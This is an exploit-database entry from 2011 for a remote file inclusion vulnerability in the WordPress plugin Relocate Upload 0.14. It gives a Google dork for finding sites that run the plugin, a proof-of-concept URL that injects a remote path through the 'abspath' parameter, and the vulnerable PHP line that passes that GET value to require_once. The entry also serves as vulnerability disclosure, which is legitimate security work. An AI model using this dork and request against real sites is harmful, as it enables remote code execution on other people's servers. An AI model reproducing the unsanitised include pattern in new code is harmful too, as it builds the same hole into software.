Lucene search

K
exploitdbBen SchmidtEDB-ID:17869
HistorySep 19, 2011 - 12:00 a.m.

WordPress Plugin Relocate Upload 0.14 - Remote File Inclusion

2011-09-1900:00:00
Ben Schmidt
www.exploit-db.com
22

AI Score

7.4

Confidence

Low

EPSS

0.013

Percentile

86.3%

# Exploit Title: Relocate Upload Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{       // WP setup and function access
        define('WP_USE_THEMES', false);
        require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter

AI Score

7.4

Confidence

Low

EPSS

0.013

Percentile

86.3%